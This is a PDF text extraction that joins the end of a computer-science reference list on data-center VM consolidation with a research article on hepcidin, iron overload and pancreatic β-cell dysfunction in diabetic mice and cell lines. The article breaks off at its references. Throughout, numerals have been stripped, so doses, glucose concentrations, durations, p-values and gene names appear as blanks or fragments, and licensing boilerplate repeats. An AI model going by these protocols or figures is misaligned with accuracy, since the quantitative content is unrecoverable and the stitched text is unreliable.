/pres/dowincite-presentation-ecc .pdf https://ecc.marist.edu/conf /pres/dowincite-presentation-ecc .pdf http://dx.doi.org/ . /peerj-cs. fan x, weber w, barroso la. . power provisioning for a warehouse-sized com- puter. in: proceedings of the th annual international symposium on computer architecture. new york: acm, – . ferdaus mh, murshed m, calheiros rn, buyya r. . virtual machine consolidation in cloud data centers using aco metaheuristic. in: euro-par parallel processing. new york: springer, – . gandhi a, harchol-balter m, das r, lefurgy c. . optimal power allocation in server farms. in: proceedings of acm sigmetrics. available at http://www .cs. stonybrook.edu/~anshul/sigmetrics_ _tech.pdf . greenberg a, hamilton j, maltz da, patel p. . the cost of a cloud: research problems in data center networks. acm sigcomm computer communication review ( ): – doi . / . . gu j, hu j, zhao t, sun g. . a new resource scheduling strategy based on genetic algorithm in cloud computing environment. journal of computers ( ): – doi . /jcp. . . - . hwang i, pedram m. . hierarchical virtual machine consolidation in a cloud computing system. in: proceedings of the ieee sixth international conference on cloud computing (cloud’ ). piscataway: ieee computer society, – . isci c, liu j, abali b, kephart jo, kouloheris j. . improving server utilization using fast virtual machine migration. ibm journal of research and development ( ): – . jiang y, shen x, chen j, tripathi t. . analysis and approximation of optimal co- scheduling on chip multiprocessors. in: proceedings of the seventeenth international conference on parallel architectures and compilation techniques, – . jiang y, tian k, shen x. . combining locality analysis with online proactive job co- scheduling in chip multiprocessors. in: proceedings of the international conference on high-performance embedded architectures and compilers, – . johnson ds, demers a, ullman jd, garey mr, graham rl. . worst-case perfor- mance bounds for simple one-dimensional packing algorithms. siam journal on computing ( ): – doi . / . kohavi r, henne rm, sommerfield d. . practical guide to controlled experiments on the web: listen to your customers not to the hippo. in: proceedings of the thirteenth annual acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . lynar tm, herbert rd, simon s. . auction resource allocation mechanisms in grids of heterogeneous computers. wseas transactions on computers ( ): – . mars j, tang l, hundt r, skadron k, soffa ml. . bubble-up: increasing utilization in modern warehouse scale computers via sensible co-locations. in: proceedings of the forty-fourth annual ieee/acm international symposium on microarchitecture (micro ). new york: acm. narayanan d, donnelly a, rowstron a. . write offloading: practical power management for enterprise storage. in: proceedings of the file and storage technologies conference, san jose, ca, – . dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www .cs.stonybrook.edu/~anshul/sigmetrics_ _tech.pdf http://www .cs.stonybrook.edu/~anshul/sigmetrics_ _tech.pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /jcp. . . - http://dx.doi.org/ . /jcp. . . - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. panigrahy r, talwar k, uyeda l, wieder u. . heuristics for vector binpacking. microsoft research technical report. redmond, microsoft. available at http: //research.microsoft.com/apps/pubs/default.aspx?id= . roytman a, kansal a, govindan s, liu j, nath s. . pacman: performance aware virtual machine consolidation. in: proceedings of the th international conference on autonomic computing (icac), – . available at https://www.usenix.org/conference/ icac /technical-sessions/presentation/roytman. schurman e, brutlag j. . performance related changes and their user impact. in: o’reilly: web performance and operations conference (velocity). tian k, jiang y, shen x. . a study on optimally co-scheduling jobs of different lengths on chip multiprocessors. in: proceedings of the acm international conference on computing frontiers. new york: acm. tulloch m. . achieve higher consolidation ratios using dynamic memory. biztech article. available at http://www.biztechmagazine.com/article/ / /achieve-higher- consolidation-ratios-using-dynamic-memory. united states environmental protection agency. . report to congress on server and data center energy efficiency public law - . technical report, epa energy star program. washington, d.c., epa. vmware, inc. . the role of memory in vmware esx server . palo alto: vmware, introduction section, paragraph , page . available at https://www.vmware.com/pdf/ esx _memory.pdf . zhang d, ehsan m, ferdman m, sion r. . dimmer: a case for turning off dimms in clouds. in: acm symposium on cloud computing (socc). new york: acm. dow ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://research.microsoft.com/apps/pubs/default.aspx?id= http://research.microsoft.com/apps/pubs/default.aspx?id= https://www.usenix.org/conference/icac /technical-sessions/presentation/roytman https://www.usenix.org/conference/icac /technical-sessions/presentation/roytman http://www.biztechmagazine.com/article/ / /achieve-higher-consolidation-ratios-using-dynamic-memory http://www.biztechmagazine.com/article/ / /achieve-higher-consolidation-ratios-using-dynamic-memory https://www.vmware.com/pdf/esx _memory.pdf https://www.vmware.com/pdf/esx _memory.pdf http://dx.doi.org/ . /peerj-cs. : – t shu, z lv et al. low hepcidin impaired mitochondria function research hepcidin as a key iron regulator mediates glucotoxicity-induced pancreatic β-cell dysfunction tingting shu ,*, zhigang lv ,*, yuchun xie , junming tang and xuhua mao department of central laboratory, jiangsu province official hospital, nanjing, jiangsu, china department of clinical laboratory, yixing people hospital, affiliated jiangsu university, yixing, wuxi, jiangsu, china correspondence should be addressed to x mao: flora @hotmail.com *(t shu and z lv contributed equally to this article) abstract it has been well established that glucotoxicity induces pancreatic β-cells dysfunction; however, the precise mechanism remains unclear. our previous studies demonstrated that high glucose concentrations are associated with decreased hepcidin expression, which inhibits insulin synthesis. in this study, we focused on the role of low hepcidin level-induced increased iron deposition in β-cells and the relationship between abnormal iron metabolism and β-cell dysfunction. decreased hepcidin expression increased iron absorption by upregulating transferrin receptor (tfr ) and divalent metal transporter (dmt ) expression, resulting in iron accumulation within cells. prussia blue stain and calcein-am assays revealed greater iron accumulation in the cytoplasm of pancreatic tissue isolated from db/db mice, cultured islets and min cells in response to high glucose stimulation. increased cytosolic iron deposition was associated with greater fe + influx into the mitochondria, which depolarized the mitochondria membrane potential, inhibited atp synthesis, generated excessive ros and induced oxidative stress. the toxic effect of excessive iron on mitochondrial function eventually resulted in impaired insulin secretion. the restricted iron content in db/db mice via reduced iron intake or accelerated iron clearance improved blood glucose levels with decreased fasting blood glucose (fbg), fasting blood insulin (fins), hba c level, as well as improved intraperitoneal glucose tolerance test (ipgtt) results. thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. introduction hepcidin is synthesized and secreted primarily in the liver and is a key regulator in iron metabolism ( , ). in , kulaksiz et  al. first reported that hepcidin was expressed in human and rat islet tissues and only existed in insulin-secreting β-cells ( ), and then other studies showed low concentration of glucose could stimulate hepcidin secretion in pancreatic beta cell line ( , ). subsequently, the correlation between hepcidin and type diabetes (t dm) has gained increased attention. in addition, several reviews have indicated that hepcidin is an independent risk factor for the onset of t dm ( , , ). indeed, the serum hepcidin levels in t dm patients has been found to be significantly lower than those in healthy individuals ( , , ). however, the mechanism by which hepcidin mediates t dm pathogenesis remains unclear. recent reports attribute the probable mechanism to the induction of peripheral tissue insulin resistance ( ) through inflammatory response, oxidative stress ( ) and - - key words f t dm f hepcidin f iron overload f pancreatic dysfunction endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:flora @hotmail.com http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : mitochondrial dysfunction pathways ( ), which affect glucose metabolism in peripheral tissues ( ). to date, there have been few reports describing the role of hepcidin in pancreatic β-cells. our previous results confirmed that the level of hepcidin was decreased under conditions of high glucose stimulation and had a disrupted effect on insulin secretion ( ). in addition, the iron status induced by decreased hepcidin expression and its possible toxic effect on β-cell function must be further evaluated and explored. the lower level of hepcidin could cause iron overload by preventing iron exportation or increase iron intake ( , ). the deposition of iron in the cytosol is pumped into mitochondria via the ion transporter mitochondrial substrate carrier family protein (mcfu) ( , ). as a divalent positively charged ion, fe + depolarizes the mitochondria membrane potential, resulting in a disruption of the electron transport chain (etc), ( ) which influences the energy supply required for insulin secretion ( ). moreover, mitochondrial function becomes impaired, which induces endoplasmic reticulum stress response (er stress), leading to β-cell apoptosis ( , ). in the situation described earlier, we believe that the iron overload in β-cells induced by low hepcidin levels plays an important role in the process of glucotoxicity-mediated depression of β-cell function. in this study, we aimed to clarify the iron overload status in the cytosol and mitochondria using the min cell line, pancreatic islets and db/db mice, as well as discuss the probable mechanism by which iron toxicity influences mitochondrial function. to this end, we used db/db mice to study the effect of restricting iron content on blood glucose levels by decreasing iron intake or accelerating iron clearance. materials and methods cell culture the mouse pancreatic β-cell line, min (passage – was kindly providing by department of islet β-cell function laboratory, jiangsu province official hospital), was cultured in dulbecco’s modified eagles medium (invitrogen) containing mm glucose and supplemented with % fetal bovine serum (invitrogen). the media was supplemented with μg/ml streptomycin, u/ml penicillin and μmol/l β-mercaptoethanol. the cells were maintained at °c in a humidified incubator under % co / % air. virus construction and gene infected the mouse hepcidin-expressing plasmid was constructed by inserting the full-length coding region of hepcidin (id: ) into pcdna . vector, and then cut from pcdna . ligated into ad-track vector (ad-hepcidin) and sequenced to confirm. for gene transfer, adenovirus generation, amplification and titration were performed. viral particles were purified using the adenovirus purification kit (cell biolabs, san diego, ca, usa). min cells were infected with adenovirus at a multiplicity of infection of at °c and, h after infection, the cells were cultured in fresh medium for another h before treating with glucose (sigma-aldrich) treatment. use ad-gfp virus as control. pancreatic islet isolation all animal studies were performed according to guidelines established by the research animal care committee of nanjing medical university. animals used for islet isolation ( -week-old c bl/ mice) were purchased from the national resource center. islets were isolated and cultured as previously described ( ). insulin immunofluorescence was performed to identify the islet cells (supplementary fig.  , see section on supplementary data given at the end of this article). gsis assay the gsis assay was performed as previously described ( ) – isolated mouse islets and min cells were transferred into -well plates ( islets/well; cells/well) and treated with different concentrations of glucose. insulin content was assessed using a commercial elisa kit (alpco diagnostics) ( ) in accordance with the manufacturer’s instructions. hepcidin and ferritin content analysis the hepcidin content of both the islets and culture supernatants was determined using a commercial elisa kit purchased from drg instruments (gmbh, marburg, germany) according to the manufacturer’s protocol. the db/db mice and their littermate control mice’ blood ferritin levels were measured using a commercial elisa kit purchased from monobind (lake forest, ca, usa) according to the manufacturer’s instructions. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : rna extraction, reverse transcription and qrt-pcr total rna was extracted using trizol reagent (invitrogen) according to the manufacturer’s protocol. reverse transcription was performed using one- step rt-pcr system (invitrogen). sybr green real- time pcr master mix (invitrogen) and light cycler ii sequence detection system (roche) were used for qrt-pcr, and mrna levels were normalized to β-actin. the sequences of the primers used for qrt-pcr are listed in supplementary table  . western blotting cells were immediately washed with ice-cold phosphate buffered saline (pbs) and lysed with lysis buffer containing mm tris–hcl (ph . ), mm nacl, . % sodium azide, . % sds, μg/ml aprotinin, % np- , % deoxycholic acid sodium salt and μg/ml pmsf. cell debris was removed by centrifugation ( , g at °c for min). the protein concentration was determined using a dc protein assay kit (bio-rad), and the protein samples were separated by sds-page, transferred to immune-blot pvdf membranes (bio-rad) and incubated at °c overnight with rabbit anti-dmt (divalent metal transporter ); rabbit anti-tfr (transferrin receptor ) (santa cruz). the membranes were then incubated at room temperature with rabbit anti-β-action antibodies (santa cruz) for h and analyzed using the ecl (enhanced chemiluminescence) purchased from sigma-aldrich. fluorescence in situ hybridization (fish) pancreatic tissues isolated from control and db/db mice were fixed in mg/ml in paraformaldehyde and frozen in oct compound (sakura, coronado, ca, usa). for fish, the probe mixture was dissolved in hybridization buffer ( % dextran sulfate, mm vanadyl-ribonucleoside complex, . % bsa, × ssc, and % formamide) and added to the tissue sections for an overnight incubation at °c. the probe sequences are listed in supplementary table  . after incubating with the secondary antibodies, images were obtained and analyzed using ix fluorescence microscope (olympus). cytosolic chelatable iron assay to visualize cytosol iron mobilization of min cells, the cells were grown in -well plates and co-loaded with diluted calcein-am purchased from life technologies. the total volume of the culture medium per well for a -well plate was µl, which included µl of the initial culture medium, µl of the test compound and µl calcein-am; all the wells contained . % dmso. both fluorescent and phase-contrast images were taken using a fluorescence microscope (olympus) at the indicated time intervals. compounds that autofluoresced were excluded. quenching of calcein-am fluorescence signifies an increase in cytosolic chelatable fe +. prussian blue staining pancreatic tissues and isolated islet cells from control and db/db mice were stained with perls’ reagent (sigma) to identify the presence of iron particles. the sections and cells were incubated with perl’s reagent with : mixture of % potassium ferrocyanide and % hydrochloric acid for min at room temperature. the slides were counterstained using nuclear fast red. prussian blue- positive cells were examined using an olympus light microscope and photographed. ros determination intracellular ros were measured by flow cytometry using , -dichlorofluorescein diacetate (dcfh-da) (bd, franklin lakes, nj, usa) as a probe. after treating the cells with different concentrations of glucose, the cells were washed twice with pbs and co-incubated with serum- free rpmi containing μm dcfh-da for min at °c in the dark and washed twice with pbs. ros were measured using canton ii flow cytometer (bd), at nm excitation and nm emission. the data were recorded using diva software (bd). determination of mitochondrial membrane potential (Δψm) we followed the methods of qiao  et  al. ( ). the Δψm in min cells was measured using a mitoscreen (jc- ) kit (bd). the cells were harvested and incubated with jc- at °c for − min, after which the staining solution was removed, washed and re-suspended in pbs. the samples were then analyzed with a canton ii flow cytometer (bd). the loss of Δψm was reflected by increased green fluorescence from the jc- monomers, as well as a loss of red fluorescence from the jc- aggregates. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : determination of adenosine ′-triphosphate (atp) release atp release from the cultured cell lines was measured using a commercially available rluciferase/luciferin (rl/l) reagent assay (promega enliten). briefly, the samples were neutralized to ph . with μl m tris and were aliquoted to a new tube with μl atp-free water. luciferase reagent was added s before measurement in the / n luminometer turner biosystems (sunnyvale, ca, usa). an atp standard curve was constructed, and all samples were measured in duplicate. to ensure a low background, a ‘blank’ containing only rl/l reagent and hbss was analyzed. atp concentrations were determined by comparison to a standard curve. animals, treatment and blood parameter determination male, four-week-old db/db mice and their littermate controls were purchased from shanghai laboratory animal centre (shanghai, china). all mice were housed in cages and maintained on a h light/darkness cycle with free access to food and water. the mice were raised for  weeks, during which time they were fed a normal chow diet (iron content: – mg/kg), low iron chow diet (iron content: mg/kg) or a normal chow diet plus iron chelator. the mouse chow were purchased from harlan teklad (madison, wi, usa) ( ). iron chelator referred to as fbs was purchased from ferrokin biosciences (san carlos, ca, usa), a magnesium salt of (s)- ´-(oh)-dadft ( ). drug was dosed at mg/kg, provided once a day. the db/db mice were divided into four groups ( mice/group): ( ) db/db; ( ) db/db + low iron diet; ( ) db/db + iron chelator and ( ) littermate control mice. body weight and fasting blood glucose (fbg) were monitored weekly, with fbg levels determined h after removing food. fasting blood insulin (fins), hba c% and an intraperitoneal glucose tolerance test (ipgtt) were monitored at and  weeks. hba c% was estimated via liquid chromatography (sysmex, tokyo, japan). ipgtt was performed in the morning with an intraperitoneal injection of g/kg glucose after -h fasting. blood glucose levels were measured at , , , and min and the area under the curve (auc) for blood glucose was analyzed with graphpad prism . all animal experimental procedures were performed in accordance with the guidelines established by the research animal care committee of nanjing medical university. statistical analysis results are presented as means ± standard error of the mean (s.e.m.). comparisons between pairs of groups were performed using student’s t-test or using anova for comparisons of multiple groups with spss . software. p values < . were considered to indicate statistical significance. results hyperglycemia inhibits hepcidin expression in db/db mice, cultured mouse islets and min cells hepcidin is expressed in pancreatic β-cells and can be released by secretory granules under glucose stimulation ( ). to assess the effect of hyperglycemia on hepcidin expression, we determined the level of hepcidin mrna expression, protein and secretion content level in db/db mouse islets, high glucose cultured mouse islets and min cells. double immunofluorescent analysis was performed to determine the level of insulin- and hepcidin expression. pancreatic islets of the mouse in the control group strongly expressed insulin- (red) and hepcidin (green), whereas in the db/db group, both insulin- and hepcidin expression were substantially decreased (fig.  a). both the hepcidin mrna level and secretion content decreased in isolated islets following high glucose stimulation (fig.  b and c). to explore whether hyperglycemia impaired gsis function was related to the low level of hepcidin, we infected an ad-hepcidin virus to min cells. the hepcidin mrna level was determined to confirm the expression efficiency (supplementary fig.  ). the gsis function was significantly restored compared with ad-gfp group (p < . ) (fig.  d). low hepcidin expression induces iron overload in pancreatic β-cells hepcidin plays a key role in iron homeostasis ( ). using a prussia blue stain assay, we assessed the iron content in isolated mouse islets cultured under high glucose conditions. consistent with our expectations, the iron content increased in a dose-dependent manner with an increase of glucose concentration stimulation as indicated by the blue-stained spots (fig.  a). to visualize iron mobilization into the cytosol under hyperglycemia stimulation, min cells were co-loaded with calcein-am. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : quenching of calcein fluorescence signified an increase in the level of cytosolic chelatable iron. the fluorescence intensity was strongly decreased in the . mm glucose stimulation group but partially recovered with ad-hepcidin-infected group (fig.  b). there was no statistically significant difference in fluorescence intensity between the . mm group and the . mm + ad-gfp group at each time point (p = . ). the cytosolic iron overload probably due to iron intake increase via divalent metal transporter (dmt- ) and transferrin receptor (tfr ) protein level increased (fig.  c). iron aggregation induces ros generation which impairs mitochondria function the excess iron in the cytoplasm could be transported into mitochondria via the mitochondrial uniporter (mcfu). the effect of iron toxicity on mitochondria is associated with the mitochondrial production of oh··radicals according to the fenton reaction mechanism (fe + h o →fe + + (oh)− + oh·) ( ). as expected, hyperglycemia increased the level of ros in min cells (fig.  a). to determine if this increase in ros was mediated by an iron overload, we pretreated cells with an iron scavenger (iron chelator), mcfu inhibitor (ru ) or infected ad-hepcidin virus and subjected the cells to high glucose stimulation. the ros content decreased in all groups compared with the . mm glucose treatment group (fig.  b). there was no statistically significant difference in ros content between the . mm group and the . mm + ad-gfp group (p = . ), nor was there any statistically significant difference between the control, ad-hepcidin, ru and iron chelator groups (supplementary fig.  ). figure  the level of hepcidin expression in control mice and db/db mice pancreatic tissue (a). relative mrna levels of hepcidin were quantified using qrt-pcr analysis with β-actin as an internal control in isolated islets with different concentrations of glucose treatment for  h. ** indicate p <  . compared with the control group (b). hepcidin content was analyzed in isolated islets using an elisa method with different concentration of glucose treatment for  h. ** indicate p <  . compared with the control group (c). gsis was measured as insulin secretion normalized to the insulin content with an elisa method in min cell with different concentrations of glucose treatment for  h. ** indicate p <  . in the ad-hepcidin-infected group compared with the ad-gfp-infected group with .  mm glucose treatment (d). values are expressed as the means ± s.d. and are representative of three individual experiments. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : excess mitochondrial iron induces ΔΨm depolarization and inhibits atp synthesis excess fe + transported into mitochondria causes inner membrane depolarization which inhibited oxidative respiratory chain and electron transfer, and atp generation is depressed. the mitochondrial membrane potential was analyzed by jc- staining. the results indicate an obvious disruption of the mitochondrial membrane potential in min cells under hyperglycemia stimulation (fig.  a). the iron content in cytoplasm was corrected by pretreating cells with an iron chelator, ru and infected ad-hepcidin virus. the ratio of red fluorescence/green fluorescence was increased compared with the hyperglycemia stimulation group (fig.  b). similarly, when the atp content was observed, hyperglycemia decreased atp content (fig.  c), whereas treatment with the iron chelator, ru , and overexpression of hepcidin could recover the level of atp (fig.  d). there was no statistically significant difference in the ratio of red fluorescence/green fluorescence and atp content between the . mm group and the . mm + ad-gfp group (p = . , p = . ), nor was there any statistically significant difference between the control, ad-hepcidin, ru and iron chelator groups (supplementary fig.  ). figure  the iron content measured by prussian blue staining in isolated mouse islets stimulated with different concentrations of glucose for  h (a). cytosolic iron mobilization was measured with calcein-am fluorescence staining in min cells with different treatments for  h. quenching of calcein-am fluorescence signifies an increase in cytosolic chelatable fe +. fluorescence% was quantified as the area under the curve (auc) from cytosolic calcein fluorescence%.*indicate p <  . compared with the control group; △indicated p <  . compared with the .  mm treatment group (b). dmt and tfr proteins were extracted from min cells with different concentration of glucose treatment for  h, analyzed by western blot; the right panel showed the relative quantification of the normalized dmt ; tfr levels to β-actin. values are expressed as the means ± s.d. and are representative of three individual experiments. *indicate p <  . compared with the control group (c). this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : effects of iron restriction on blood glucose levels and insulin levels in db/db mice the results presented in the current manuscript suggest that lower hepcidin expression eventually leads to decreased insulin release (fig.  ). in this case, we restricted the iron content of db/db mice by feeding the animals low iron chow or normal chow + iron chelator. an analysis of body weight, fbg, ipgtt, hba c% and fins were performed. at  weeks, the fbg of db/db mice just started to raise compared with control group (fig.  b). there is no differences between the db/db animals under different treatment conditions (   weeks).the mice on the low iron chow and iron chelator gained less weight than the db/db mice but remained significantly obese compared to the control mice (p < . , fig.  a). since body weight is a major determinant of the glucose tolerance status, we next studied whether these differences in weight might improve glucose tolerance. in the iron chelator and low iron chow groups, the ipgtt was higher compared with control group but was much improved compared to the db/db group, which is consistent with the relationship with body weight (fig.  c). we also observed a partial reversion on fbg, hba c% and fins in the iron chelator and low iron chow groups when compared to control db/db mice (fig.  c, d and e). there was no difference of fbg, ipgtt, hba c% and fins in control mice with normal chow or low iron chow or iron chelator except of body weight at  weeks (supplementary fig.  ). iron restriction was associated with a considerable benefit in the blood glucose control. we adopted ferritin to judge the level of serum iron content in the mice. in the iron chelator and low iron chow groups, the ferritin level was slightly higher compared with the control group but was much improved compared to the db/db group (fig.  f). the linear regression models to reveal the relationship between iron content and fbg, ipgtt, hba c% and fins. as expected, the higher of ferritin level, the worse of blood glucose level of mice (fig.  g, h, i and j). discussion our previous study demonstrated that in addition to its role on iron regulation, hepcidin is involved in glucotoxicity-mediated impairment of pancreatic β-cell function by inhibiting insulin synthesis ( ). under hyperglycemic conditions, the expression of hepcidin was inhibited and the iron metabolism balance was disrupted. however, whether this iron metabolism disorder is related to the failure of β-cell function remains unknown. in the present study, we clearly demonstrated that a low expression of hepcidin leads to an iron overload in β-cells, a portion of excess fe + that accumulates in figure  the level of ros was measured by dcfh-da staining and flow cytometry analysis following treatment with different concentrations of glucose for  h in min cells. statistical graph of dcfh-da green fluorescence-positive cells as the fold change compared to the control. **indicate p <  . compared with the control group (a). min cells were infected with ad-hepcidin or treated with ru or an iron chelator plus .  mm glucose. the level of ros was measured via dcfh-da staining and flow cytometry. △△indicate p <  . compared with the .  mm glucose group (b). this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : the cytoplasm is stored in a stable complex as ferritin ( , ), whereas the other portion is pumped into the mitochondria via mcfu ( , ). in the mitochondria, the accumulation of fe + can impair mitochondrial function through: ( ) the generation of a large amount of ros via the fenton/haber–weiss mechanism (fe + + h o → fe + + (oh)− + oh•) ( , ); and ( ) ΔΨm depolarization, which affects electron transport, damaging the mitochondrial aerobic respiratory pathway, and inhibiting atp synthesis ( , ). all of these toxic effects could be reversed by ad-hepcidin infected, ru , and an iron chelator. gsis function was also improved with a recovery in hepcidin levels. our data clearly indicate that iron overload plays an important role in the mitochondria dysfunction mediated β-cell function under conditions of hyperglycemia (fig.  ). the regulation of hepcidin on iron metabolism mainly through iron absorption and iron exported pathway and was different in each tissue. hepcidin-knockout mice develop iron overload in the liver and pancreas, but iron deficit in the macrophage-rich spleen ( ). there should be a negative correlation between the iron content and ferroportin (fpn) expression level. however, we didn’t observe the high expression of fpn associated with low hepcidin expression in min cells with . mm glucose stimulated h (data not shown). we presumed the mechanism that hepcidin internalized fpn leading to its degradation clarified in other cell types was not conserved in pancreatic beta cell. there were several evidence supported our presumption. first fpn exported iron primarily from duodenal enterocytes, reticuloendothelial and macrophages. although fpn was the main receptor for hepcidin and exercising the duty to iron exported, the mechanism of its action to hepcidin in other cells was not clearly understood ( ). second, there was not a connection between iron overload and fpn up-expression but with increased iron intake in hansen’s work ( ) which also confirmed by our study with high glucose stimulation, the dmt and tfr protein expression was increased (as fig.  c showed). this results indicated iron intake may involve in this process, but the specific molecular was not understand now. figure  the ΔΨm was measured by jc- staining and flow cytometry analysis following treatment with different glucose concentrations for  h in min cells. statistical percentage of jc- red fluorescence and green fluorescence is shown in picture (a). min cells were infected with ad-hepcidin or treated with ru or iron chelator plus .  mm glucose. the ΔΨm was measured by jc- staining and flow cytometry analysis (b). the atp content was measured by atp fluorescence analysis following treatment with various glucose concentrations for  h in min cells. ** indicate p <  . compared with the control group (c). min cells were infected with ad-hepcidin or treated with ru or iron chelator plus .  mm glucose and the level of atp was measured. △△ indicate p <  . compared with the .  mm glucose group (d). this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : our results indicate that decreased iron deposition in the pancreatic tissue can decrease blood glucose in a t dm animal and cell model, for which the associated mechanism has also been discussed above. another study conducted by cooksey also confirmed our resulted that restriction iron intake or with iron chelation could figure  db/db mice were fed either a normal diet chow, low iron content diet chow or iron chelator for  weeks. body weight and fasting blood glucose (fbg) levels were recorded every week and then integrated as curve chart (a and b). ipgtt, hba c% and fasting insulin content (fins) were recorded at and  weeks (c, d, and e). the level of ferritin was measured using an elisa (f). *indicates p <  . compared with the control group. △indicates p <  . compared with the db/db group. correlations between ferritin levels and fbg, ipgtt, hba c%, fins (g, h, i and j). regression lines and % confidence intervals are plotted if statistical significance is present. r presented the correlation coefficient of linear regression models. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : significantly ameliorate high blood glucose in ob/ob mice ( ) (mouse model for type diabetes, the ob/ob lep−/−). but it showed a better effect on glucose control in iron chelator group than low iron chow diet group. while in our study the fbg, ipgtt, hba c% and fins level between this two groups with no statistical difference in db/db mice. in cooksey’t study, they inferred that mg/kg iron content chow would induce iron-deficiency anemia in ob/ob mice which restricted hypoglycemic effect. in our study, with this dosage iron diet feed, the hemoglobin (hb) content was maintained at normal levels at  week, once the diet contains less than mg/kg iron, the mice began to displayed low levels of hb, erythrocyte mean corpuscular volume (mcv), mean corpuscular hemoglobin (mch), and were diagnosed as having iron- deficiency anemia at   weeks (supplementary fig.  ). we also found body weight was lower in iron restriction diet group (supplementary fig.  ). the reason for slower weight increase in mouse due to iron restriction was unknown yet. although we achieved a satisfactory improvement in blood glucose for the early onset of t dm in db/db mice (   weeks) with iron restriction, whether iron treatment will have an effect in a long-term group of db/db mice remains unknown. in the early stage of t dm, the effect of impaired ros production on mitochondrial function and the impact of oxidative stress on β-cell function are reversible. thus, alleviating the toxic effects of iron accumulation could significantly restore the function of β-cells. however, when β-cell functionality has been irreparable destroyed, simply correcting the expression of hepcidin and inhibiting iron deposition may have little to no effect on blood glucose levels. at this stage, improving insulin signaling and insulin resistance would be a more appropriate treatment ( ). in conclusion, we have identified a hepcidin- mediated pathway of glucotoxicity, resulting in impaired β-cell functionality. the decreased hepcidin expression could lead to iron accumulation in the cytoplasm and mitochondria. the mitochondrial membrane potential was depolarized, which inhibited atp synthesis and promoted excessive ros production inducing oxidative stress. abnormal iron metabolism in the mitochondria eventually impaired insulin secretion as fig.  showed. relieved iron overload status had a positive effect on the blood glucose control in the early onset of t dm in db/db mice. thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this work was supported by a grant from the health and family planning commission of wuxi city (q ). figure  diagram depicting the role of hepcidin-mediated glucose toxicity on pancreatic β cell. with hyperglycemia stimulation, hepcidin expression decreased leading to iron overload in the cytosol. the excessive iron could squeeze into mitochondria via mcfu transported causing ΔΨm depolarization; inhibited atp production and induced massive ros production. the dysfunction of mitochondria inevitably led to insulin secretion decrease in pancreatic β cells. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : author contribution statement all authors took part in the conception and design of the study, as well as either drafting or critically revising the manuscript. all authors have approved the final version of the manuscript. tingting shu, zhigang lv, yuchun xie and junming tang collected the data and carried out the data analysis. xvhua mao is responsible for the integrity of the work as a whole. data availability statement the datasets used and analyzed during the current study are available from the corresponding author on reasonable request. references daher r, manceau h & karim 